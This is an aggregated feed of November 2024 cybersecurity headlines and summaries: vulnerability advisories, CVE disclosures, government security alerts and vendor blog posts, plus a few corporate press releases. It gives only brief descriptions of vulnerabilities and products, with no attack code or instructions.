2024-11-21T00:00:00Z | 1732147200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1961
GoCast name parameter OS command injection vulnerability
2024-11-21T00:00:00Z | 1732147200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1960
MC Technologies MC LR Router web interface I/O configuration OS command injection vulnerabilities
2024-11-21T00:00:00Z | 1732147200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1953
MC Technologies MC LR Router web interface configuration upload OS command injection vulnerability
2024-11-21T00:00:00Z | 1732147200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1954
GoCast HTTP API lack of authentication vulnerability
2024-11-21T00:00:00Z | 1732147200

https://talosintelligence.com/vulnerability_reports/TALOS-2024-1962
New Report Reveals Hidden Risks: How Internet-Exposed Systems Threaten Critical Infrastructure
2024-11-21T00:00:00Z | 1732147200

A new Censys report found 145,000 exposed ICSs and thousands of insecure human-machine interfaces (HMIs), providing attackers with an accessible path to disrupt critical operations. Real-world examples underscore the danger, with Iranian and Russian-backed hackers exploiting HMIs to manipulate water systems in Pennsylvania and Texas. GreyNoise research further highlights the urgency: attackers are actively scanning for HMIs and prioritizing Remote Access Services (RAS) over complex ICS protocols, making these easily accessible entry points prime targets for exploitation.

https://www.greynoise.io/blog/new-report-reveals-hidden-risks-how-internet-exposed-systems-threaten-critical-infrastructure
Managing AI Bots as Part of Your Overall Bot Management Strategy
2024-11-20T20:00:00Z | 1732132800

Learn about the potential impacts of AI bots and the importance of having a holistic bot management strategy.

https://www.akamai.com/blog/security/2024/nov/managing-ai-bots-part-overall-bot-management-strategy
Aryaka Unveils New Survey Report Exploring Network Security Trends in Manufacturing
2024-11-20T12:48:44Z | 1732106924

Santa Clara, CA – November 20, 2024 – Aryaka®, the leader in Unified SASE as a Service, today announced the release of a new research report exploring network security challenges and trends in the manufacturing industry. Conducted by GatePoint Research, the report (“The State of Network Security in Manufacturing: Key Findings on Visibility, Resource Constraints,... The post Aryaka Unveils New Survey Report Exploring Network Security Trends in Manufacturing appeared first on Aryaka.

https://www.aryaka.com/press/2024-manufacturing-network-security-survey/
Kathryn Thornton: Correcting Hubble's vision | Starmus highlights
2024-11-20T10:00:00Z | 1732096800

The veteran of four space missions discusses challenges faced by the Hubble Space Telescope and how human ingenuity and teamwork made Hubble’s success possible

https://www.welivesecurity.com/en/we-live-science/kathryn-thornton-correcting-hubbles-vision-starmus-highlights/
High Threat Security Alert (A24-11-16): Multiple Vulnerabilities in Apple Products
2024-11-20T04:00:00Z | 1732075200

Apple has released iOS 17.7.2, iOS 18.1.1, iPadOS 17.7.2, iPadOS 18.1.1, macOS Sequoia 15.1.1 and Safari 18.1.1 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-11-17): Vulnerability in Google Chrome
2024-11-20T04:00:00Z | 1732075200

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Don't let the Grinch Steal Your Passwords this Holiday Season by Lucie Cardiet
2024-11-20T00:00:00Z | 1732060800

Protect yourself this holiday season from malicious websites. Learn how hackers deceive shoppers and how to stay secure online.

https://www.vectra.ai/blog/beware-of-malicious-websites-and-using-identical-passwords-this-holiday-season
Evaluating Solidity support in AI coding assistants
2024-11-19T14:00:37Z | 1732024837

AI-enabled code assistants (like GitHub’s Copilot, Continue.dev, and Tabby) are making software development faster and more productive. Unfortunately, these tools are often bad at Solidity. So we decided to improve them! To make it easier to write, edit, and understand Solidity with AI-enabled tools, we have: Added support for Solidity into Tabby […]

https://blog.trailofbits.com/2024/11/19/evaluating-solidity-support-in-ai-coding-assistants/
Segmenting Hybrid Clouds: What to Look for in a Solution
2024-11-19T14:00:00Z | 1732024800

Learn how to select a microsegmentation solution to fortify your organization?s cloud security strategies and protect your assets across multiple public clouds.

https://www.akamai.com/blog/security/2024/nov/segmenting-hybrid-clouds-what-to-look-for-in-solution
LEVEL UP: Detecting Phishing with GenAI
2024-11-19T13:31:00Z | 1732023060

In today’s phishing landscape, attackers are constantly refining their techniques, making it increasingly difficult for defenders to keep up. Modern phishing schemes are designed with multiple chains, ensuring that only real users - rather than security tools - reach the final phishing payload. Attackers often require users to perform multiple steps—such as navigating through landing pages, solving captchas or QR codes, and following complex redirect chains. To make detection even more difficult, attackers frequently employ network-based evasion techniques like geolocation filtering and user-agent checks, only displaying the final phishing page to users from specific regions or devices. If these conditions aren’t met, the phishing page may display benign content or block access, as can be seen here:    Another challenge is to detect the final phishing payload itself. Traditional solutions rely on computer vision and reference lists to identify impersonated brands, but this approach has significant limitations. Less popular or regional brands often go undetected, because it is not feasible to constantly keep brand lists up to date. This leads to gaps in protection, as can be seen here:Phishing URL for Deriv, a lesser-known financial platform, not detected by urlscan.ioUsing GenAI to tackle Phishing ChallengesTo address these challenges, we are proud to release today JoeSandbox AI —a new plugin for Joe Sandbox that combines advanced language models (LLMs) with AI-guided UI automation. Rather than relying on reference lists, Joe Sandbox AI leverages sophisticated language models and contextual analysis to detect phishing attempts across emails, documents and webpages, thereby capturing even the most nuanced threats without brand-specific dependencies.Detecting Landing PagesPhishing usually starts with an email containing a link or attached documents containing links. Joe Sandbox AI already kicks in here and performs inference utilizing the visual and text content of the document. By identifying these phishing characteristics directly in documents, our solution can accurately assess the threat even when network-based conditions are in place to hide the payload:Full Analysis: https://www.joesandbox.com/analysis/1555851/0/htmlJust as Joe Sandbox AI can analyze documents, it also excels at identifying phishing attempts directly within emails. In the example below, the email is crafted to look like a purchase confirmation from a known service provider, complete with an invoice to add legitimacy. Joe Sandbox AI flagged this as phishing due to several key indicators: it was sent from a generic Gmail address, the subject and sender information do not match any legitimate business pattern, and it includes an attachment with a random filename. In addition, the email contains a link with the urgent text “Transaction Invoice”:Full Analysis: https://www.joesandbox.com/analysis/1556359/0/htmlReaching the final Phishing Payload To tackle complex phishing chains Joe Sandbox AI uses the latest multi modal large language (MMLLM) models to simulate user interactions. Joe Sandbox AI does not parse the HTML of the webpage but rather depends on the visual content of the page. It understands which parts of the page are buttons and links and which one is most likely clicked by a human. Hence it can navigate JavaScript-based redirects and follow conditional paths that reveal the true phishing content. Below, you can watch the AI clicker in action, solving basic captchas and following redirect chains to reach the final phishing page. Full analysis: https://www.joesandbox.com/analysis/1530877/0/htmlDetecting the final Phishing PayloadOnce Joe Sandbox reaches the final phishing page, Joe Sandbox AI conducts a thorough analysis of the page’s structure and behaviour, pinpointing elements commonly used in phishing—such as login forms, credential fields, and brand impersonation techniques. Again, this is achieved by analysing the visual content with an MMLLM. Joe Sandbox AI effectively identifies phishing pages across both well-known and niche brands. In one example, our solution flagged a phishing page impersonating Meta, by detecting elements designed to mimic official support and login portals. In another case, it successfully identified a phishing page targeting Deriv, a lesser-known financial platform. Despite the brand’s lower visibility, Joe Sandbox AI’s advanced analysis detected the same deceptive patterns aimed at capturing user credentials. This demonstrates Joe Sandbox AI’s ability to accurately assess phishing threats, regardless of brand familiarity or popularity.Full analysis: https://www.joesandbox.com/analysis/1555173/0/htmlFull analysis: https://www.joesandbox.com/analysis/1549918/0/htmlDetecting inactive Phishing Phishing pages have a short lifetime. Often, they are disabled by hosting providers within minutes. Still Joe Sandbox AI can detect them through the document or email analysis or landing page detection. Additionally, Joe Sandbox AI uses LLMs to analyze the URL of the submitted sample directly. Even though the immediate threat of the attack has passed, detecting inactive phishing links still provides valuable insights for security analysts.Full analysis: https://www.joesandbox.com/analysis/1555387/0/htmlConclusionJoe Sandbox AI represents a major advancement in phishing detection, addressing the limitations of traditional methods with a robust combination of generative AI and AI-guided UI automation. By eliminating reliance on static brand lists and instead applying contextual analysis across emails, documents, and webpages, Joe Sandbox AI captures nuanced phishing attempts without brand-specific dependencies, ensuring comprehensive threat detection.Our solution excels at detecting phishing threats at every stage - whether embedded within an email, hidden in a document, or displayed on a final phishing page. Joe Sandbox AI navigates complex redirects, handles JavaScript-driven flows, and even solves basic captchas, enabling it to reach and analyze the final phishing payload that other systems might miss. This capability is critical in capturing the full scope of a phishing attack, even when sophisticated evasion techniques are employed.Through its advanced capabilities, Joe Sandbox AI empowers security teams to gain complete visibility into phishing schemes, whether targeting widely recognized brands or lesser-known entities. This comprehensive approach not only improves detection accuracy but also provides valuable insights into attacker tactics, helping organizations stay ahead in the constantly evolving phishing landscape. Would you like to try Joe Sandbox? Register for a free account on Joe Sandbox Cloud Basic or contact us for an in-depth technical demo!

https://www.joesecurity.org/blog/6811663389969520216
Highlights from Q3 2024 Cato CTRL SASE Threat Report
2024-11-19T13:26:00Z | 1732022760

Introduction   Today, we published the Q3 2024 Cato CTRL SASE Threat Report, which summarizes findings from Cato CTRL’s analysis of 1.46 trillion network flows across more than 2,500 customers globally between July and September 2024.   Key Findings  Threat actors recruiting pen testers for ransomware affiliate programs   In closely monitoring discussions on the RAMP forum, Cato... The post Highlights from Q3 2024 Cato CTRL SASE Threat Report  appeared first on Cato Networks.

https://www.catonetworks.com/blog/highlights-from-q3-2024-cato-ctrl-sase-threat-report/
Revolutionizing TLS Inspection: How Cato Networks Is Transforming Encrypted Traffic Security
2024-11-19T13:25:00Z | 1732022700

Introduction  In today’s digital environment, encrypted traffic has become the norm, with over 90% of web communications now utilizing encryption. While this secures data in transit, it has become a blind spot for enterprises, enabling attackers to hide malware within encrypted channels. According to the Q3 2024 Cato CTRL SASE Threat Report, organizations that enable... The post Revolutionizing TLS Inspection: How Cato Networks Is Transforming Encrypted Traffic Security  appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-cato-is-transforming-encrypted-traffic-security/
Q3 2024 Cato CTRL SASE Threat Report
2024-11-19T13:23:00Z | 1732022580

The post Q3 2024 Cato CTRL SASE Threat Report appeared first on Cato Networks.

https://www.catonetworks.com/resources/the-cato-ctrl-sase-threat-report-q3-2024/
Everything You Need to Know About Edge Networks
2024-11-19T13:00:00Z | 1732021200

https://www.akamai.com/blog/edge/2024/nov/everything-you-need-to-know-about-edge-networks
My information was stolen. Now what?
2024-11-19T10:00:00Z | 1732010400

The slow and painful recovery process

https://www.welivesecurity.com/en/cybersecurity/my-information-was-stolen-now-what/
High Threat Security Alert (A24-11-14): Multiple Vulnerabilities in Palo Alto Products
2024-11-19T04:00:00Z | 1731988800

Palo Alto has published security advisories to address multiple vulnerabilities in PAN-OS.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-11-15): Multiple Vulnerabilities in Apache Tomcat
2024-11-19T04:00:00Z | 1731988800

The Apache Software Foundation released security updates to address the vulnerabilities in the Apache Tomcat.

https://www.govcert.gov.hk/en/alerts_detail.php
The Need for Cyber Fraud Fusion Centers
2024-11-19T00:00:00Z | 1731974400

From Magecart to Mobile Menaces

https://www.recordedfuture.com/blog/the-need-for-cyber-fraud-fusion-centers
Protecting your organization while using Wi-Fi (ITSAP.80.009)
2024-11-18T20:32:36Z | 1731961956

https://cyber.gc.ca/en/guidance/protecting-your-organization-while-using-wi-fi-itsap80009
Cisco and MGM Resorts International Sign Multi-Year Agreement
2024-11-18T17:12:00Z | 1731949920

Global gaming and entertainment company MGM Resorts International signs a Whole Portfolio Agreement with Cisco to deliver next-generation guest experiences. More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2024/m11/cisco-and-mgm-resorts-international-sign-multi-year-agreement.html
Consumers Face Rising Credit Reliance Despite Lower Interest Rates
2024-11-18T16:11:22Z | 1731946282

“The latest UK Finance card spending report for August 2024 reflects a continued reliance on credit for household finances. The rate of inflation may have slowed, but consumers are still finding themselves struggling with the prevailing cost of living. Most notably, consumers significantly increased their reliance on credit card debt despite a relatively low level of growth in total spend. Specifically, overall credit card spend grew by just 1.9%, below the rate of household inflation, but outstanding balances on credit cards grew by 7.4% over that same period, well in excess of inflation. Despite the recent decreases in the Bank of England’s interest rates, and the lower rate of inflation, this increase to underlying indebtedness suggests that consumers are still feeling the pressure of financial strain.“TransUnion’s Q3 2024 Consumer Pulse survey revealed that 85% of consumers rank inflation as one of their top three concerns over the next three months. Many are continuing to feel the impacts of high borrowing costs, and this growing dependency on credit points to a need for support to promote financial resilience among UK households.“As consumers continue to face uncertainty, responsible lending and data-driven decision-making are more essential than ever. Financial institutions must use up-to-date consumer insights to better understand borrowers’ financial health, supporting sustainable financial wellbeing amid ongoing economic challenges.”

https://newsroom.transunion.co.uk/consumers-face-rising-credit-reliance-despite-lower-interest-rates/
Five Ways to Prevent and Protect Against Ransomware Attacks
2024-11-18T14:00:00Z | 1731938400

https://www.akamai.com/blog/security/2024/nov/five-ways-to-protect-against-ransomware-attacks
eBook – ZTNA to Universal ZTNA
2024-11-18T11:43:05Z | 1731930185

The post eBook – ZTNA to Universal ZTNA  appeared first on Cato Networks.

https://www.catonetworks.com/resources/ebook-ztna-to-universal-ztna/
High Threat Security Alert (A24-11-12): Multiple Vulnerabilities in Palo Alto Products
2024-11-18T04:00:00Z | 1731902400

Palo Alto has published security advisories to address multiple vulnerabilities in PAN-OS.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-11-13): Multiple Vulnerabilities in Microsoft Edge
2024-11-18T04:00:00Z | 1731902400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Guia de Transição Digital e Cibersegurança do CNCS
2024-11-18T00:00:00Z | 1731888000

Com o objetivo de orientar as organizações quanto à prevenção dos riscos de cibersegurança durante os seus processos de transição digital, o CNCS desenvolveu o Guia de Transição Digital e Cibersegurança (GTDC). Este trabalho advém da crescente digitalização das atividades organizacionais, que para além de inúmeras oportunidades para a inovação e a eficiência, também assume desafios significativos relacionados com a cibersegurança. Principais objetivos do GTDC: Definir objetivos claros de transição digital: adaptar as iniciativas digitais às necessidades do negócio com segurança; Identificar e mitigar riscos: compreender os desafios específicos de cibersegurança inerentes à digitalização e implementar medidas eficazes para os mitigar; Integrar a cibersegurança nos planos de investimento: alinhar as decisões estratégicas com as melhores práticas e normas estabelecidas pelo CNCS, em conformidade com a legislação nacional e europeia, incluindo o Regime Jurídico de Segurança do Ciberespaço. O guia é composto por um documento detalhado e uma ferramenta web interativa, que facilita a implementação de controlos e medidas de cibersegurança adequados para diferentes contextos organizacionais. O GTDC para além de contribuir para uma transição digital segura, também visa capacitar as organizações quanto à: Mitigação dos riscos mais relevantes nos seus processos de transformação digital; Apoio aos seus decisores na elaboração de estratégias e planos de investimento em cibersegurança. Consultar o Guia e a ferramenta web.

https://dyn.cncs.gov.pt/pt/detalhe/art/135898/guia-de-transicao-digital-e-ciberseguranca-do-cncs
Akamai?s Perspective on November?s Patch Tuesday 2024
2024-11-15T14:00:00Z | 1731679200

https://www.akamai.com/blog/security-research/2024/nov/akamai-perspective-patch-tuesday-november-2024
National Cyber Security Centre's weekly review – 44/2024
2024-11-15T13:47:59Z | 1731678479

This week we tell you how you can check if your home router is visible on the internet and the cybersecurity challenges of the highly digitised real estate and construction sector.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-442024
National Cyber Security Centre's weekly review – 44/2024
2024-11-15T13:47:59Z | 1731678479

This week we tell you how you can check if your home router is visible on the internet and the cybersecurity challenges of the highly digitised real estate and construction sector.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-442024
Vulnerability in TCL Camera software
2024-11-14T15:30:00Z | 1731598200

Path Traversal vulnerability (CVE-2024-11136) has been found in TCL Camera software.

https://cert.pl/en/posts/2024/11/CVE-2024-11136/
ESG Watch | November 2024
2024-11-14T15:21:35Z | 1731597695

Key news in this edition:  COP29 in Azerbaijan: Between controversies and milestones. Canada and South Africa take steps to implement sustainable taxonomies.  Impact Disclosure Taskforce releases Final Impact Disclosure Guidance aimed to boost UN Sustainable Development Goals. editorial As COP29 unfolds in Azerbaijan the same discussions as last year are being had on the integrity of global climate conferences hosted by fossil fuel-reliant nations with questionable human rights records. Despite these concerns, COP29 has already reached some important milestones in its first few days, with nations approving carbon credit rules for the creation of a UN-backed carbon market. While this agreement marks a significant development for carbon markets, allegations of greenwashing continue to shadow the sustainable investment sector, as evidenced by ClientEarth's complaint against BlackRock. This is just the latest in a series of greenwashing cases, which highlights the need for clearer definitions and stricter regulations to uphold investor trust.

https://www.s-rminform.com/esg-watch/esg-watch-november-2024
Vulnerability in DInGO dLibra software
2024-11-14T15:00:00Z | 1731596400

Reflected XSS vulnerability (CVE-2024-7124) has been found in Poznan Supercomputing and Networking Center's DInGO dLibra software.

https://cert.pl/en/posts/2024/11/CVE-2024-7124/
Attestations: A new generation of signatures on PyPI
2024-11-14T14:00:15Z | 1731592815

For the past year, we’ve worked with the Python Package Index (PyPI) on a new security feature for the Python ecosystem: index-hosted digital attestations, as specified in PEP 740. These attestations improve on traditional PGP signatures (which have been disabled on PyPI) by providing key usability, index verifiability, cryptographic strength, and provenance properties that bring […]

https://blog.trailofbits.com/2024/11/14/attestations-a-new-generation-of-signatures-on-pypi/
The Definitive Guide to Linux Process Injection
2024-11-14T14:00:00Z | 1731592800

https://www.akamai.com/blog/security-research/2024/nov/the-definitive-guide-to-linux-process-injection
CVE-2024-47255
2024-11-14T13:54:00Z | 1731592440

CWE-345 INSUFFICIENT VERIFICATION OF DATA AUTHENTICITY: In 2N Access Commander versions 3.1.1.2 and prior, a local attacker can escalate their privileges in the system which could allow for arbitrary code execution with root permissions. Update to Access Commander version 3.2.

https://claroty.com/team82/disclosure-dashboard/cve-2024-47255
CVE-2024-47254
2024-11-14T13:53:00Z | 1731592380

CWE-345 INSUFFICIENT VERIFICATION OF DATA AUTHENTICITY: In 2N Access Commander versions 3.1.1.2 and prior, an Insufficient Verification of Data Authenticity vulnerability could allow an attacker to escalate their privileges and gain root access to the system. Update to Access Commander version 3.2.

https://claroty.com/team82/disclosure-dashboard/cve-2024-47254
CVE-2024-47253
2024-11-14T13:51:00Z | 1731592260

CWE-22 IMPROPER LIMITATION OF A PATHNAME TO A RESTRICTED DIRECTORY ('PATH TRAVERSAL'): In 2N Access Commander versions 3.1.1.2 and prior, a Path Traversal vulnerability could allow an attacker to write files on the filesystem to achieve arbitrary remote code execution. Update to Access Commander version 3.2.

https://claroty.com/team82/disclosure-dashboard/cve-2024-47253
TransUnion Expands Strategic Relationship with LexisNexis Risk Solutions to Help U.K. Insurance Providers Serve their Customers
2024-11-14T10:25:00Z | 1731579900

Global information and insights company TransUnion has expanded its long-standing relationship with LexisNexis® Risk Solutions, a leading provider of insurance data and advanced analytics, to offer TransUnion’s Affordability Report to U.K. insurance providers as part of a suite of powerful and predictive credit reporting and affordability solutions, including TrueVision® Public and TrueVision® at the point of quote.  LexisNexis Risk Solutions delivers high-volume, real-time data into hundreds of millions of U.K. insurance transactions a day via the LexisNexis® Informed Quotes platform. The business currently streamlines TransUnion data into approximately 20 U.K. insurance providers, including three of the U.K.’s top insurers.When delivered into the insurance workflow via LexisNexis Risk Solutions, TransUnion’s comprehensive view of a consumer’s income and affordability can help insurance providers manage portfolio risks whilst enabling quicker, more informed decisions to help support new customers.·       TransUnion’s Affordability Report helps insurance providers to assess the most appropriate premium payment option and interest rate for the individual based on their current financial situation. This enables providers to offer suitable payment options at speed, as part of the quote process, helping consumers to select, secure and pay for insurance in a way that is affordable.·       By offering insurance providers seamless access to TransUnion’s Affordability Report at the point of quote, LexisNexis Risk Solutions is assisting them in providing consumers with access to affordable premium payment options, as a streamlined part of their shopping and buying experience.As many households face ongoing challenges due to the cost-of-living crisisi, the additional insights on affordability at the point of quote will help the insurance market help their customers while also supporting Consumer Duty obligations.Kelli Fielding, chief product officer at TransUnion in the UK, said: “Affordability is a particular focus for many insurers at the moment. There is an ongoing squeeze on consumer finances, and almost half (46%) of households indicate their income is currently struggling to keep up with inflation.ii So, it's essential for insurance providers to better understand their customers’ financial situations. This means offering products tailored to their individual needs to support more sustainable and responsible decisions. By distributing TransUnion’s enhanced Affordability Report, along with TrueVision® Public and TrueVision, LexisNexis Risk Solutions can help its insurer clients build trust and strengthen both existing and new customer relationships.”Louise Johnson, director of product management, insurance, U.K. and Ireland, at LexisNexis Risk Solutions, said: “Our insurance customers have been benefitting from streamlined access to TrueVision® via LexisNexis Informed Quotes since 2022. Expanding our relationship with TransUnion will help the insurance industry provide consumers the cover they need with the premium paid in a way they can afford, by offering crucial insight over premium affordability data. The value of this insight has become all the more pertinent now that the ABI has set out its Premium Finance Principlesiii and BIBA publishes its own Premium Finance Guide for Brokersiv. The fact that these insights can be accessed alongside risk data on the individual at the point of quote, essentially means insurance providers can offer consumers more personalised policies, premiums and payment options.”Notes:i 43% of respondents strongly disagree or disagree with the statement ‘My household income is keeping up with the rate of inflation’. Data comes from TransUnion’s Q3 Consumer Pulse research, conducted among 1,000 respondents in September 2024.ii 43% of respondents strongly disagree or disagree with the statement ‘My household income is keeping up with the rate of inflation’. Data comes from TransUnion’s Q3 Consumer Pulse research, conducted among 1,000 respondents in September 2024.iii https://www.abi.org.uk/news/news-articles/2024/4/abi-takes-action-on-motor-premium-finance/iv https://www.biba.org.uk/press-releases/new-guidance-to-help-brokers-show-fair-value-in-premium-finance-arrangements/

https://newsroom.transunion.co.uk/transunion-expands-strategic-relationship-with-lexisnexis-risk-solutions-to-help-uk-insurance-providers-serve-their-customers/
Request for Expression of Interest : Applications are wanted for 2 Vacancies of Individual Consultant
2024-11-14T05:22:41Z | 1731561761

Strengthening of BGD e-GOV CIRT Project under Bangladesh Computer Council and announces the vacancies for the following consultant position for the project. Details of the vacancies are given below. Click here to View or Download the REoI Download the Document from here Guidance notes on the use of the Standard Request for Application (SRFA) for selection of Individual Consultants are provided in Microsoft word format.... Read More

https://www.cirt.gov.bd/reoi-oct-24/
ETW Forensics - Why use Event Tracing for Windows over EventLog? -
2024-11-14T01:00:00Z | 1731546000

Many people may think of EventLogs when one mentions Windows OS logs. When investigating incidents such as malware infections, it is common to analyze the Windows OS EventLogs to find traces that may help uncover the incident. However, since the...

https://blogs.jpcert.or.jp/en/2024/11/etw_forensics.html
Russian Sabotage Activities Escalate Amid Fraught Tensions
2024-11-14T00:00:00Z | 1731542400

Russia’s sabotage in Europe threatens NATO allies, targeting infrastructure to weaken Ukraine support. Explore tactics, goals, and risks.

https://www.recordedfuture.com/research/russian-sabotage-activities-escalate-amid-fraught-tensions
Cisco Reports First Quarter Earnings
2024-11-13T21:05:00Z | 1731531900

Cisco reported first quarter revenue of $13.8 billion, net income on a generally accepted accounting principles (GAAP) basis of $2.7 billion or $0.68 per share, and non-GAAP net income of $3.7 billion or $0.91 per share.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2024/m11/cisco-reports-first-quarter-earnings.html
Black Duck Recognized as a Leader in Software Composition Analysis by Independent Research Firm
2024-11-13T15:34:00Z | 1731512040

Black Duck receives highest possible scores in nine of the 25 criteria and second highest score overall in the current offering category. BURLINGTON, Mass., Nov. 13, 2024 /PRNewswire/ -- Black...

https://news.blackduck.com/2024-11-13-Black-Duck-Recognized-as-a-Leader-in-Software-Composition-Analysis-by-Independent-Research-Firm
Riasztás Microsoft termékeket érintő sérülékenységekről – 2024. november
2024-11-13T14:13:03Z | 1731507183

A Nemzetbiztonsági Szakszolgálat Nemzeti Kibervédelmi Intézet (NBSZ NKI) riasztást ad ki a Microsoft szoftvereket érintő kritikus kockázati besorolású sérülékenységek kapcsán, azok súlyossága, kihasználhatósága és a szoftverek széleskörű elterjedtsége miatt.

https://nki.gov.hu/figyelmeztetesek/riasztas/riasztas-microsoft-termekeket-erinto-serulekenysegekrol-2024-november/
Study Reveals Security Teams Feel the Impact of Rising API Threats
2024-11-13T11:30:00Z | 1731497400

API abuse is increasing at an alarming rate. Read this post to learn the four areas of focus for organizations that are seeking to protect their APIs.

https://www.akamai.com/blog/security/2024/nov/study-reveals-security-teams-feel-impact-rising-api-threats
Killing Filecoin nodes
2024-11-13T11:00:12Z | 1731495612

In January, we identified and reported a vulnerability in the Lotus and Venus clients of the Filecoin network that allowed an attacker to remotely crash a node and trigger a denial of service. This issue is caused by an incorrect validation of an index, resulting in an index out-of-range panic. The vulnerability […]

https://blog.trailofbits.com/2024/11/13/killing-filecoin-nodes/
The Top 4 Industry 4.0 Challenges and How SASE Helps Manufacturers Overcome Them
2024-11-13T09:17:15Z | 1731489435

Industry 4.0 is bringing technological and innovative advantages to the manufacturing industry. AI, IoT, and RPA, for example, are transforming and streamlining the design, production and distribution of products. But these advancements also bring new challenges for manufacturers. This blog post highlights four of the most prominent ones—based on real experiences from Cato’s manufacturing customers—and... The post The Top 4 Industry 4.0 Challenges and How SASE Helps Manufacturers Overcome Them  appeared first on Cato Networks.

https://www.catonetworks.com/blog/top-industry-challenges-and-how-sase-helps-manufacturers-overcome-them/
High Threat Security Alert (A24-11-07): Multiple Vulnerabilities in Microsoft Products (November 2024)
2024-11-13T04:00:00Z | 1731470400

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-11-08): Multiple Vulnerabilities in Google Chrome
2024-11-13T04:00:00Z | 1731470400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-11-09): Multiple Vulnerabilities in Fortinet Products
2024-11-13T04:00:00Z | 1731470400

Fortinet released security advisories to address multiple vulnerabilities in Fortinet systems.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-11-10): Multiple Vulnerabilities in Ivanti Products
2024-11-13T04:00:00Z | 1731470400

Ivanti has released a security advisory to address multiple vulnerabilities in Ivanti products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A24-11-11): Multiple Vulnerabilities in Citrix Products
2024-11-13T04:00:00Z | 1731470400

Citrix released security advisories to address multiple vulnerabilities in Citrix products.

https://www.govcert.gov.hk/en/alerts_detail.php
Patchetirsdag november 2024
2024-11-12T20:56:35Z | 1731444995

Microsoft har offentliggjort sine månedlige sikkerhetsoppdateringer. Det er totalt 93 sårbarheter i november. Tre av disse er vurdert som kritiske av Microsoft.

https://nsm.no/fagomrader/digital-sikkerhet/nasjonalt-cybersikkerhetssenter/varsler-fra-ncsc/patchetirsdag-november-2024
UK and allies warn about shift in cyber attackers exploiting zero-day vulnerabilities
2024-11-12T14:59:14Z | 1731423554

NCSC and international partners share top 15 vulnerabilities that were routinely exploited by cyber attackers last year.

https://www.ncsc.gov.uk/news/uk-allies-warn-shift-in-cyber-attackers-exploiting-zero-day-vulnerabilities
National Cyber Security Centre's weekly review – 45/2024
2024-11-12T11:36:07Z | 1731411367

Text message scams are around constantly, but they are also stopped in cooperation by the authorities and service providers. We also tell you about scams that take advantage of data breaches of booking systems, which have been a nuisance to hotel customers for a long time.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-452024
National Cyber Security Centre's weekly review – 45/2024
2024-11-12T11:36:07Z | 1731411367

Text message scams are around constantly, but they are also stopped in cooperation by the authorities and service providers. We also tell you about scams that take advantage of data breaches of booking systems, which have been a nuisance to hotel customers for a long time.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centres-weekly-review-452024
CVE-2024-50380
2024-11-12T10:35:00Z | 1731407700

CWE-290: AUTHENTICATION BYPASS BY SPOOFING Snap One OVRC cloud uses the MAC address as an identifier to provide information when requested. An attacker can impersonate other devices by supplying enumerated MAC addresses and receive sensitive information about the device. Read more: "The Problem with IoT Cloud Connectivity and How it Exposed All OvrC Devices to Hijacking"

https://claroty.com/team82/disclosure-dashboard/cve-2024-50380
CVE-2024-50381
2024-11-12T10:33:00Z | 1731407580

CWE-306: MISSING AUTHENTICATION FOR CRITICAL FUNCTION A vulnerability exists in Snap One OVRC cloud where an attacker can impersonate a Hub device and send requests to claim and unclaimed devices. The attacker only needs to provide the MAC address of the targeted device and can make a request to unclaim it from its original connection and make a request to claim it. OvrC Pro: All versions prior to 7.3 are affected. Read more: "The Problem with IoT Cloud Connectivity and How it Exposed All OvrC Devices to Hijacking"

https://claroty.com/team82/disclosure-dashboard/cve-2024-50381
China-Nexus TAG-112 Compromises Tibetan Websites to Distribute Cobalt Strike
2024-11-12T00:00:00Z | 1731369600

China-based TAG-112 exploited Tibetan sites to spread Cobalt Strike malware. Recorded Future reveals targeted threats by state-sponsored actors.

https://www.recordedfuture.com/research/china-nexus-tag-112-compromises-tibetan-websites
Vectra AI Platform Now Includes Threat Detection and Response for Azure to Stop Hybrid/ Multi-Cloud Attacks Fast by Tiffany Nip
2024-11-12T00:00:00Z | 1731369600

Learn how Vectra AI enhances threat detection in Microsoft Azure, overcoming challenges native tools miss for better threat detection and response.

https://www.vectra.ai/blog/introducing-vectra-ai-threat-detection-and-response-for-azure-to-stop-hybrid-multi-cloud-attacks-fast
Vectra AI Platform Helps Microsoft Customers Strengthen Hybrid and Multi-Cloud Defense to Combat Non-Stop Cyber Attacks by John Mancini
2024-11-12T00:00:00Z | 1731369600

Discover how Vectra AI strengthens Microsoft hybrid and multi-cloud defenses, filling gaps in native security tools to combat evolving cyber threats.

https://www.vectra.ai/blog/vectra-ai-platform-helps-microsoft-customers-strengthen-hybrid-and-multi-cloud-defense-to-combat-non-stop-cyber-attacks
Testing the Koord2ool
2024-11-11T14:51:52Z | 1731336712

